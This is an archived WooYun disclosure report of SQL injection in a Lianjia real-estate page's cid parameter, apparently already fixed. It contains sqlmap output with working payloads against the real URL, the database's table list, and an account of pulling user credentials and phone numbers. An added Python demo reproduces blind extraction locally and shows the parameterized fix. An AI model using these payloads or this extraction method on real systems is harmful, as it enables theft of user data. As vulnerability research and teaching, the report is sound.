WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
Disclosure timeline:
2015-04-28: Details reported to the vendor; awaiting vendor response
2015-04-29: Vendor confirmed; details disclosed to the vendor only
2015-05-09: Details disclosed to core white hats and domain experts
2015-05-19: Details disclosed to regular white hats
2015-05-29: Details disclosed to intern white hats
2015-06-13: Details disclosed to the public
http://huodong.homelink.com.cn/xinfang/seckill.php?cid=24
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=24 AND 6904=6904

    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: cid=-7099 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7172716871,0x756a546c425a62466a65,0x7167796c71),NULL#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: cid=24; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=24 AND SLEEP(5)
---
web application technology: PHP 5.4.28
back-end DBMS: MySQL 5.0.11
Database: homelink
[191 tables]
+---------------------------------------------+
| app_pic |
| comm_his_trans_record |
| community |
| community_pic |
| community_relate_subwayline_walktime |
| decoration_company |
| decoration_company_complaints |
| decoration_company_dic |
| decoration_company_pic |
| decoration_company_plan |
| decoration_company_plan_audit_log |
| decoration_company_share_comm |
| decoration_company_users |
| district |
| district_business |
| era_agent |
| era_agent_community |
| era_agent_complain |
| era_agent_familiar_area |
| era_agent_four_phone |
| era_agent_four_phone_stat |
| era_agent_permission |
| era_agent_pic |
| era_agent_pic_dic |
| era_agent_school_pic |
| era_agent_school_pic_dic |
| era_basis_subway_line |
| era_basis_subway_station |
| era_basis_subway_station_community_relation |
| era_building_year |
| era_com_app_version |
| era_comment_failure_history |
| era_comment_report |
| era_community_agent_rank |
| era_community_app_push |
| era_community_build_relation |
| era_community_com_log |
| era_community_com_pic |
| era_community_comments |
| era_community_frame_base_info |
| era_community_frame_pic |
| era_community_his_price |
| era_community_impression |
| era_community_index_bottom |
| era_community_master |
| era_community_nearby_community |
| era_community_periphery |
| era_customer_house |
| era_details_see_community |
| era_details_see_house |
| era_faq_answers |
| era_faq_asked_question |
| era_faq_category |
| era_faq_suggested_experts |
| era_faq_suggested_keywords |
| era_for_searcher |
| era_for_searcher_subway |
| era_frontpage_recommend |
| era_house |
| era_house_accues |
| era_house_com_delete |
| era_house_comment |
| era_house_comment_dic |
| era_house_list_agnet |
| era_house_modify_logs |
| era_house_notification |
| era_house_pic |
| era_house_price_change |
| era_map_heat_data |
| era_no_synchronization_pic |
| era_org |
| era_owner_house_comment |
| era_owner_house_comment_dic |
| era_owner_score |
| era_rank_dic |
| era_school_best_comm |
| era_school_building_relation |
| era_school_cj |
| era_school_comment |
| era_school_comment_agents |
| era_school_comment_dic |
| era_school_community_stat |
| era_school_counterpart_periphery |
| era_school_district_info |
| era_school_label |
| era_school_pic |
| era_se_agent_assess |
| era_se_customer |
| era_see_house |
| era_see_house_assess |
| era_see_house_middle |
| era_store_community |
| era_store_community_relation |
| era_user_favorites |
| era_user_orbit_collect_five |
| era_user_orbit_collect_four |
| era_user_orbit_collect_one |
| era_user_orbit_collect_three |
| era_user_orbit_collect_two |
| era_user_orbit_interest_house |
| era_user_orbit_s_analyze_result |
| era_user_orbit_s_area_analyze |
| era_user_orbit_s_bbd_analyze |
| era_user_orbit_s_comm_analyze |
| era_user_orbit_s_floor_analyze |
| era_user_orbit_s_fyear_analyze |
| era_user_orbit_s_ho_analyze |
| era_user_orbit_s_price_analyze |
| era_user_orbit_s_room_analyze |
| era_user_orbit_similar_business |
| era_user_orbit_similar_comm |
| era_user_push_hid |
| era_user_recommend |
| fphone_agent_change_city_log |
| fphone_base_info |
| fphone_pri_bind_route_set |
| fphone_pri_ext_add |
| fphone_pri_route_add |
| house_count |
| house_hot_recommend_bak |
| job_log |
| kettle_job_log |
| kettle_setp_log |
| kettle_trans_log |
| licai_mobile |
| nanjing_yz_entrust |
| new_community |
| new_community_bk |
| new_community_comment |
| new_community_dict |
| new_community_frame |
| new_community_near_comm |
| new_community_pic |
| new_community_user |
| new_communtiy_panic_buying |
| new_communtiy_panic_buying_record |
| pg_bdm_element |
| pg_business_trend |
| pg_city_trend |
| pg_community_trend |
| pg_factor_dict |
| pg_factor_type |
| pg_rent_example |
| pg_user_transaction |
| pinyin |
| temp_true_house |
| tj_house |
| tj_house_pic |
| tj_house_preference |
| tj_qi |
| tj_user |
| v_era_se_agent_assess |
| v_web_user_clinet |
| wct_no_synchronization_pic |
| web_admin |
| web_admin_phone |
| web_ads |
| web_ads_position |
| web_broker |
| web_group |
| web_log |
| web_menu |
| web_score_active_user |
| web_score_address |
| web_score_aduser |
| web_score_details |
| web_score_order |
| web_score_shop |
| web_score_usercount |
| web_score_xls |
| web_search_log |
| web_user_client |
| web_user_login |
| web_user_mobile |
| web_zhuanti |
| web_zhuanti_era |
| web_zhuanti_keywords |
| yz_entrust |
| yz_follow_up |
| zt_bj_temp_true_house |
| zt_bj_temp_true_house_num |
| zt_bj_temp_true_house_pj |
| zt_bj_video_house |
| zt_cdzhenfy |
| zt_countrysite_draw |
| zt_countrysite_drawlog |
| zt_countrysite_userinfo |
| zt_qdmuxiao2014_20140730 |
| zt_qdmuxiao2014_record |
| zt_shanghai_draw |
| zt_shanghai_drawlist |
+---------------------------------------------+
I took a look: the data is about the same as in WooYun: Lianjia official site SQL injection can leak 700k users' information (链家官网SQL注射可导致70w用户信息泄露), except that the count is now 870,000. The user information is in the web_user_client table:
Pulling a few fields (username, password, mobile) to take a look:
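The boolean-based blind technique that sqlmap listed first above, worked through locally as an added example; this is not code from the original report or from Lianjia. It assumes a constructed in-memory SQLite stand-in for the homelink database with a seckill table looked up by cid and a web_user_client table whose column names (username, password, mobile) follow the report; the row contents are made up. The vulnerable lookup pastes cid straight into the SQL, the way seckill.php?cid= evidently did, and the extractor recovers a column value through nothing but the true/false page difference, which is why the report could enumerate 191 tables from one GET parameter. MySQL-specific pieces of the page's payloads (the hex-literal CONCAT markers, SLEEP(), the # comment) are not reproduced; unicode()/substr() are the SQLite spellings of MySQL's ORD()/MID().

```python
import sqlite3


def build_db():
    """Constructed stand-in for the homelink schema; row contents are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE seckill (cid INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO seckill VALUES (24, 'xinfang seckill');
        CREATE TABLE web_user_client (id INTEGER PRIMARY KEY, username TEXT,
                                      password TEXT, mobile TEXT);
        INSERT INTO web_user_client
            VALUES (1, 'demo_user', '5f4dcc3b5aa765d61d8327deb882cf99', '13800000000');
    """)
    return conn


def vulnerable_lookup(conn, cid):
    """The bug class behind seckill.php?cid=: the parameter is concatenated into SQL."""
    return conn.execute("SELECT title FROM seckill WHERE cid=" + cid).fetchall()


def safe_lookup(conn, cid):
    """Hardened form: enforce the integer type (ValueError otherwise), then bind it."""
    return conn.execute("SELECT title FROM seckill WHERE cid=?", (int(cid),)).fetchall()


def page_renders(conn, condition):
    """Boolean oracle: the 'true' page returns the seckill row, the 'false' page nothing.
    This is the same distinction sqlmap draws between cid=24 AND 6904=6904 and a
    false comparison."""
    return len(vulnerable_lookup(conn, "24 AND (" + condition + ")")) > 0


def extract_string(conn, subquery, max_len=64):
    """Recover the result of `subquery` through the oracle alone, one character at a
    time, binary-searching each code point over 0..127 (7 oracle calls per character),
    which is what sqlmap's boolean-based blind mode does."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            # unicode('') is NULL in SQLite, so past the end every comparison is false
            if page_renders(conn, f"unicode(substr(({subquery}),{pos},1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:
            break  # end of the string
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print("true page :", vulnerable_lookup(db, "24 AND 6904=6904"))
    print("false page:", vulnerable_lookup(db, "24 AND 6904=6905"))
    print("leaked    :", extract_string(db, "SELECT mobile FROM web_user_client WHERE id=1"))
    try:
        safe_lookup(db, "24 AND 6904=6904")
    except ValueError as e:
        print("hardened  : rejected ->", e)
```

The same oracle drives the UNION, stacked and time-based variants sqlmap reported; the blind form is the slowest but the one that still works when the page reflects nothing from the query, so a fix that only hides query output does not close it. The safe_lookup form is the actual fix: type-check the parameter and pass it as a bound value, never as part of the SQL text.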
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-04-29 10:02
Thank you for your attention to Lianjia's security.
None yet